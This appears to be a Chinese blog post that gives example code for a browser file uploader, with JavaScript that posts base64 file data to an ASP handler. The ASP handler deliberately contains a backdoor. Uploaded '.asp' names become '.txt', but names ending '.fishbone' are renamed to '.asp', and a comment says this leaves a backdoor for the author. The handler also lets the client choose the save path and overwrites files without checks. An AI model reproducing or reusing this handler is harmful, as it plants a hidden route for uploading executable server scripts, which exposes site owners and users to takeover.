html上传文件的实例

html页面代码

 

< meta  HTTP-EQUIV ="content-type"  CONTENT ="text/html; charset=UTF-8" >
上传文件 < INPUT  TYPE ="file"  NAME =""  id ="a" >< br >
存放路径 < INPUT  TYPE ="text"  NAME =""  id ="b"  onclick ="showpath()" > 需写上文件名 < BR >
< input  type =button  onclick ='upload($("a").value,$("b").value)'  value =上传 >< br >
< span  id ="spath" ></ span >< br >
< span  id ="nowurl" ></ span >
< STYLE  TYPE ="text/css"  TITLE ="" >
.tfont { font-size : 12px }
</ STYLE >  


< SCRIPT  LANGUAGE ="JavaScript" >
<!--
function  showpath(){
     var  path = new  Ajax();
     var  d = function (o){
    $( " spath " ).innerHTML = o.responseText;};
     var  w = function (){};
    path.open( " http://10.84.50.220/WebService1/uploadfile.asp " , " post " ,d,w);
}
function  overit(){
event.srcElement.style.cursor = " hand " ;
event.srcElement.style.background = " #EECC99 " ;
}
function  outit(){
event.srcElement.style.background = " transparent " ;
}
function  s(){
event.srcElement.parentNode.style.display = " none " ;
$( " b " ).focus();
$( ' b ' ).value = event.srcElement.innerHTML;
}
function  upload(surl,turl){
    surl = surl.replace( / / / g, " // " );
     var  read = new  xmlhttp();
     var  read2 = new  xmlhttp();
     var  xml_dom  =   new  ActiveXObject( " MSXML2.DOMDocument " );
    xml_dom.loadXML( ' <?xml version="1.0" ?> <root/> ' );
    xml_dom.documentElement.setAttribute( " xmlns:dt " ,  " urn:schemas-microsoft-com:datatypes " );
     var  l_node1  =  xml_dom.createElement( " file1 " );
     var  fname  =  xml_dom.createElement( " name " );
    l_node1.dataType  =   " bin.base64 " ;
    read.open( " get " ,surl, true );
    read.onreadystatechange = p;
    read.send( null );
         function  p(){
             if  (read.readystate == 4 )
            {
                fname.nodeTypedValue = turl;
                l_node1.nodeTypedValue  = read.responseBody;
                xml_dom.documentElement.appendChild(l_node1);
                xml_dom.documentElement.appendChild(fname);
                read2.open( " POST " , " http://10.84.50.220/WebService1/uploadfile.asp " , true );
                 try {read2.setRequestHeader( " Content-Type " , " text/xml " );} catch (e){
                 try {read2.overrideMimeType( ' text/xml ' );} catch (e){}
            }
        read2.onreadystatechange = function (){
             if (read2.readystate == 4 && read2.status == 200 ){
                $( " nowurl " ).innerHTML = " <a href=http://www.cnjpzs.com/fishbone/ " + turl + " >now url</a> " ;
            }
                 else {$( " nowurl " ).innerHTML = " 上传中…… " + read2.readystate;}
            }
        read2.send(xml_dom);
        }
    }
}
// xmlhttprequest对象
function  xmlhttp(){
var  xmlhttp  =   false ; // 以下写法为JS条件编译写法
/* @cc_on
   @if (@_jscript_version >= 5)
      try {
      xmlhttp = new ActiveXObject("Msxml2.XMLHTTP")
      }
      catch (e){
         try {
         xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")
         }
         catch (e2){
         xmlhttp = false
         }
      }
   @end
@ */
if  ( ! xmlhttp  &&   typeof  XMLHttpRequest  !=   ' undefined ' )
    {xmlhttp  =   new  XMLHttpRequest()}
return  xmlhttp;
}
/* Ajax核心,兼容IE以及FF的XMLHttpRequest对象 */
function  Ajax(){
     var  xmlhttp  =   false ,isComplete  =   false ; // 以下写法为JS条件编译写法
     /* @cc_on
       @if (@_jscript_version >= 5)
          try {
          xmlhttp = new ActiveXObject("Msxml2.XMLHTTP")
          }
          catch (e){
             try {
             xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")
             }
             catch (e2){
             xmlhttp = false
             }
          }
       @end
    @ */
     if  ( ! xmlhttp  &&   typeof  XMLHttpRequest  !=   ' undefined ' )
        {xmlhttp  =   new  XMLHttpRequest()}
      this .open  =   function (url, method, feedback,process, arg)
      {
         if  ( ! xmlhttp)  return   false ;
        isComplete  =   false ;
        method  =  method.toUpperCase();
    
         try  {
           if  (method  ==   " GET " )
          {
            xmlhttp.open(method, url + " ? " + arg,  true );
            arg  =   null ;
          }
           else
          {
            xmlhttp.open(method, url,  true );
            xmlhttp.setRequestHeader( " Method " ,  " POST  " + url + "  HTTP/1.1 " );
            xmlhttp.setRequestHeader( " Content-Type " , " application/x-www-form-urlencoded " );
            xmlhttp.setRequestHeader( " Connection " , " close " );
          }
          xmlhttp.onreadystatechange  =   function (){
             if  (xmlhttp.readyState  ==   4   &&   ! isComplete)
            {
              isComplete  =   true ;
               if (xmlhttp.status == 200 ){
                  feedback(xmlhttp);}
                   else {feedback(xmlhttp.status)}
              }
               else
              {process(xmlhttp.readyState);}
              
              };
          xmlhttp.send(arg);
        }
         catch (z) {  return   false ; }
         return   true ;
      };
       return   this ;
};
// =================
// -->
</ SCRIPT >

 对应的服务器上传文件：

 

< %@ language = vbscript codepage = 65001 % >
< %
dim  ado_stream
dim  xml_dom
dim  xml_file1
Dim  str
On   Error   Resume   next
set  ado_stream  =  Server.CreateObject( " ADODB.Stream " )
Set  xml_dom  =  Server.CreateObject( " Microsoft.XMLDOM " )
xml_dom.load(request)
set  xml_file1  =  xml_dom.selectSingleNode( " root/file1 " )
Set  xml_name = xml_dom.selectSingleNode( " root/name " )
Set  reg = new  RegExp
reg.pattern = " .asp "
str = xml_name.nodeTypedValue
str = Replace (str, " .asp " , " .txt " ) ' 将上传的asp文件重命名，防止别人上传asp文件
str = Replace (str, " .fishbone " , " .asp " ) ' 如果name的后缀名为fishbone,则更名成asp文件，给自己上传asp文件留后门
ado_stream.Type  =   1  
ado_stream.open 
ado_stream.write xml_file1.nodeTypedValue
ado_stream.SaveToFile server.mappath( " . " ) & " " & str, 2   '  2=adSaveCreateOverWrite 
ado_stream.close
set  ado_stream  =   Nothing  
set  xml_dom  =   Nothing
If  Err.number <> 0   Then  response.write Err.description
Response.Write  " Upload successful! "
% >